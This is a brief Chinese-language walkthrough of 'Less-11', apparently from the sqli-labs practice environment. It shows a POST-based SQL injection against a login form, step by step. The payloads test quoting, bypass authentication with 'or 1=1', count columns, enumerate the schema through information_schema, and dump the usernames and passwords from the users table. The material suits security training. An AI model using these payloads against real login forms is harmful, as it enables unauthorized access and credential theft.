Less-11

0x01 判断注入类型

POST_字符型_单引号

抓包，重放

uname=1&passwd=1&submit=Submit
uname=1&passwd=1'&submit=Submit
uname=1&passwd=1"&submit=Submit
#1,3返回正确，2返回错误

0x02 判断注入点

uname=1&passwd=1'or 1=1#&submit=Submit

0x03 判断字段数

uname=1&passwd=1'order by 3#&submit=Submit

0x04 判断数据库名，用户名

uname=1&passwd=-1'union select database(),user()#&submit=Submit
#数据库名为security，用户名为root

0x05 判断表名

uname=1&passwd=-1'union select database(),group_concat(table_name)from information_schema.tables where table_schema='security'#&submit=Submit
#表名为emails,referers,uagents,users

0x06 判断字段名

uname=1&passwd=-1'union select database(),group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'#&submit=Submit
#字段名为id，username,password

0x07 得到数据

uname=1&passwd=-1'union select database(),group_concat(username)from users#&submit=Submit

uname=1&passwd=-1'union select database(),group_concat(password)from users#&submit=Submit